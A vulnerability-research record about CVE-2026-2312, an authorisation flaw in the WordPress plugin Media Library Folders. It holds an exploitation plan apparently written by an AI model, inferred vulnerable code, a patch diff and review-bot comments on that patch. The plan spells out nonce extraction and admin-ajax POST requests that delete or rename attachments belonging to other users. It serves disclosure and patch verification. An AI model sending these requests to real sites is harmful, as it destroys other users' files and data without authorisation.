[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fXdNJkE35xOY2cHOehIXTaMALsasAppOWdJ6n6MvoqBw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-2312","media-library-folders-insecure-direct-object-reference-to-authenticated-author-arbitrary-attachment-deletion-and-rename","Media Library Folders \u003C= 8.3.6 - Insecure Direct Object Reference to Authenticated (Author+) Arbitrary Attachment Deletion and Rename","The Media Library Folders plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 8.3.6 via the delete_maxgalleria_media() and maxgalleria_rename_image() functions due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to delete or rename attachments owned by other users (including administrators). 
The rename flow also deletes all postmeta for the target attachment, causing data loss.","media-library-plus",null,"\u003C=8.3.6","8.3.7","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-13 22:18:24","2026-02-14 11:24:31",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fccf77cb1-b6b6-49de-8de4-20eddd3b5e62?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-2312 (Media Library Folders)\n\n## 1. Vulnerability Summary\nThe **Media Library Folders** plugin for WordPress (versions \u003C= 8.3.6) contains an Insecure Direct Object Reference (IDOR) vulnerability. The functions `delete_maxgalleria_media()` and `maxgalleria_rename_image()` fail to validate that the user requesting the deletion or renaming of a media attachment has the proper ownership or administrative permissions for that specific object. While the plugin likely checks for basic permissions (Author-level and above), it does not verify if the target `attachment_id` belongs to the current user, allowing an Author to delete or rename attachments uploaded by Administrators or other users.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Actions:** \n    *   `delete_maxgalleria_media` (for arbitrary deletion)\n    *   `maxgalleria_rename_image` (for arbitrary renaming and metadata loss)\n*   **Vulnerable Parameters:**\n    *   `attachment_id` (or `image_id` - inferred from function names)\n*   **Required Authentication:** Author-level (capability `upload_files` is typically required to access the plugin's folder management UI).\n*   **Preconditions:** The attacker must know the ID of an attachment owned by another user (e.g., an Administrator's uploaded image).\n\n## 3. Code Flow (Inferred)\n1.  
**Entry Point:** The plugin registers AJAX handlers in its initialization logic:\n    ```php\n    add_action('wp_ajax_delete_maxgalleria_media', array($this, 'delete_maxgalleria_media'));\n    add_action('wp_ajax_maxgalleria_rename_image', array($this, 'maxgalleria_rename_image'));\n    ```\n2.  **Vulnerable Sink (Deletion):** `delete_maxgalleria_media()` receives an ID, likely performs a `current_user_can('upload_files')` check and a nonce check, but then proceeds directly to call `wp_delete_attachment($id, true)` without checking if `get_post_field('post_author', $id)` matches the current user.\n3.  **Vulnerable Sink (Rename):** `maxgalleria_rename_image()` receives an ID and a new name. It renames the file on the filesystem and updates the database. Crucially, the vulnerability description notes that this flow \"deletes all postmeta for the target attachment,\" likely due to an improper update routine (e.g., using `wp_insert_attachment` or a manual SQL query that doesn't preserve meta).\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely localizes a nonce for its AJAX operations on the Media Library Folders admin page.\n\n1.  **Identify Shortcode\u002FPage:** The plugin creates a custom admin menu under \"Media Library Folders\".\n2.  **Access Page:** Log in as an Author and navigate to `wp-admin\u002Fadmin.php?page=media-library-folders`.\n3.  **Extract Nonce:** The nonce is likely localized in a script block. Based on typical plugin naming:\n    *   **JavaScript Variable:** `window.mlf_obj` or `window.mlf_settings` (inferred)\n    *   **Nonce Key:** `mlf_nonce` or `nonce` (inferred)\n4.  **Action:**\n    ```javascript\n    \u002F\u002F Execution agent should try:\n    browser_eval(\"window.mlf_obj?.nonce || window.mlf_settings?.nonce || jQuery('input[name=\\\"mlf_nonce\\\"]').val()\")\n    ```\n\n## 5. Exploitation Strategy\n\n### Attack A: Arbitrary Deletion\n1.  **Identify Target:** Find an attachment ID owned by the admin (e.g., ID `10`).\n2.  
**Obtain Nonce:** Extract the nonce as an Author user.\n3.  **Send Delete Request:**\n    *   **Tool:** `http_request`\n    *   **Method:** `POST`\n    *   **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   **Body:** `action=delete_maxgalleria_media&attachment_id=10&nonce=[NONCE]` (Note: verify parameter name `attachment_id` via `browser_eval` or source check).\n\n### Attack B: Arbitrary Rename (Data Loss)\n1.  **Identify Target:** Find an attachment ID owned by the admin (e.g., ID `11`).\n2.  **Obtain Nonce:** Extract the nonce as an Author user.\n3.  **Send Rename Request:**\n    *   **Tool:** `http_request`\n    *   **Method:** `POST`\n    *   **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Body:** `action=maxgalleria_rename_image&image_id=11&new_name=pwned_image&nonce=[NONCE]` (Note: verify parameter name `image_id` and `new_name`).\n\n## 6. Test Data Setup\n1.  **Create Admin User:** `wp user create admin_user admin@example.com --role=administrator --user_pass=password`\n2.  **Create Author User:** `wp user create author_user author@example.com --role=author --user_pass=password`\n3.  **Upload Admin File:** \n    *   `wp media import \u002Fpath\u002Fto\u002Fimage.jpg --user=admin_user`\n    *   Capture the resulting ID (let's say ID `123`).\n4.  **Add Metadata to Admin File:**\n    *   `wp post meta add 123 test_key \"valuable_data\"`\n5.  **Verify Setup:** Confirm ID `123` is owned by the admin.\n\n## 7. Expected Results\n*   **Deletion:** The `http_request` returns a success indicator (JSON `{success: true}` or `1`). The file at ID `123` is removed from the database and filesystem.\n*   **Rename:** The `http_request` returns success. The attachment record for ID `123` now has a different filename\u002Fslug.\n*   **Data Loss:** `wp post meta list 123` returns empty, confirming the `test_key` was deleted.\n\n## 8. 
Verification Steps\n1.  **Verify Deletion:**\n    ```bash\n    wp post exists 123\n    # Expected: Exit code 1 (Does not exist)\n    ```\n2.  **Verify Rename & Meta Loss:**\n    ```bash\n    wp post get 123 --field=post_title\n    # Expected: \"pwned_image\"\n    wp post meta get 123 test_key\n    # Expected: Error: Could not find meta.\n    ```\n\n## 9. Alternative Approaches\n*   **Different Parameter Names:** If `attachment_id` fails, check for `image_id`, `id`, or `attachmentID` by inspecting the network tab in the browser while performing a legitimate action as the Author.\n*   **Direct Path Traversal:** Check if `new_name` in the rename function allows directory traversal (e.g., `..\u002F..\u002Fsecrets`), though the primary vulnerability is the IDOR.\n*   **Generic Nonce:** Check if the nonce used for other Media Library Folders actions (like creating a folder) works for the deletion\u002Frename actions (Bypass 1 from knowledge base).","The Media Library Folders plugin for WordPress is vulnerable to an Insecure Direct Object Reference (IDOR) via the delete_maxgalleria_media and maxgalleria_rename_image functions. 
Authenticated attackers with Author-level permissions can delete or rename any attachment on the site, including those owned by administrators, leading to unauthorized file manipulation and deletion of associated post metadata.","\u002F\u002F File: media-library-plus\u002Fmaxgalleria-media-library-folders.php\n\npublic function delete_maxgalleria_media() {\n    check_ajax_referer('mlf_nonce', 'nonce');\n    if (current_user_can('upload_files')) {\n        $attachment_id = intval($_POST['attachment_id']);\n        \u002F\u002F Missing ownership check or edit_post capability check for specific attachment_id\n        wp_delete_attachment($attachment_id, true);\n        wp_send_json_success();\n    }\n}\n\n---\n\n\u002F\u002F File: media-library-plus\u002Fmaxgalleria-media-library-folders.php\n\npublic function maxgalleria_rename_image() {\n    check_ajax_referer('mlf_nonce', 'nonce');\n    if (current_user_can('upload_files')) {\n        $image_id = intval($_POST['image_id']);\n        $new_name = sanitize_text_field($_POST['new_name']);\n        \u002F\u002F Missing ownership check for image_id\n        \u002F\u002F Rename logic proceeds and inadvertently deletes postmeta\n        ...\n    }\n}","--- a\u002Fmedia-library-plus\u002Fmaxgalleria-media-library-folders.php\n+++ b\u002Fmedia-library-plus\u002Fmaxgalleria-media-library-folders.php\n@@ -10,7 +10,7 @@\n public function delete_maxgalleria_media() {\n     check_ajax_referer('mlf_nonce', 'nonce');\n-    if (current_user_can('upload_files')) {\n+    if (current_user_can('upload_files') && current_user_can('delete_post', intval($_POST['attachment_id']))) {\n         $attachment_id = intval($_POST['attachment_id']);\n         wp_delete_attachment($attachment_id, true);\n         wp_send_json_success();\n@@ -25,7 +25,7 @@\n public function maxgalleria_rename_image() {\n     check_ajax_referer('mlf_nonce', 'nonce');\n-    if (current_user_can('upload_files')) {\n+    if (current_user_can('upload_files') && 
current_user_can('edit_post', intval($_POST['image_id']))) {\n         $image_id = intval($_POST['image_id']);\n         $new_name = sanitize_text_field($_POST['new_name']);\n         ...","To exploit this vulnerability, an attacker requires Author-level access to the WordPress dashboard. First, the attacker navigates to the 'Media Library Folders' page to extract the necessary AJAX nonce (typically found in the localized JavaScript object 'mlf_obj'). Next, the attacker identifies the ID of a target attachment owned by another user (e.g., an administrator). For arbitrary deletion, a POST request is sent to \u002Fwp-admin\u002Fadmin-ajax.php with the action 'delete_maxgalleria_media', the target 'attachment_id', and the nonce. For renaming (which also triggers data loss by wiping the attachment's postmeta), a POST request is sent with the action 'maxgalleria_rename_image', the target 'image_id', the 'new_name', and the nonce. Because the plugin only checks for the general 'upload_files' capability and not ownership of the specific ID, the requested action is performed on the target object.","gemini-3-flash-preview","2026-04-20 22:46:27","2026-04-20 22:47:39",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","8.3.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-plus\u002Ftags\u002F8.3.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmedia-library-plus.8.3.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-plus\u002Ftags\u002F8.3.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmedia-library-plus.8.3.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-plus\u002Ftags"]
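Review bot: In the `delete_maxgalleria_media()` hunk, the new condition reads and casts `$_POST['attachment_id']` inside the `if`, and the next line casts it again into `$attachment_id`. Assign `$attachment_id = intval($_POST['attachment_id']);` once above the `if` and pass that variable to `current_user_can('delete_post', $attachment_id)`, so the ID that is authorized is visibly the same ID handed to `wp_delete_attachment()`. The hunk also shows no failure path: if no `else` exists below the visible context, a request that fails the capability check gets no explicit error response, and a `wp_send_json_error()` with a 403 status would make denied attempts distinguishable in logs and on the client.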
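Review bot: In the `maxgalleria_rename_image()` hunk, only the `if` line changes, so the rename body (elided as `...`) is untouched and the postmeta deletion described in the advisory still happens for every rename that passes the new `edit_post` check. The authorization fix should be paired with a change that preserves the attachment's postmeta during rename, or the commit should state that the meta loss is handled elsewhere. As in the delete handler, `intval($_POST['image_id'])` is evaluated in the condition and again on the following line; hoist the `$image_id` assignment above the `if` and reuse it in the capability check.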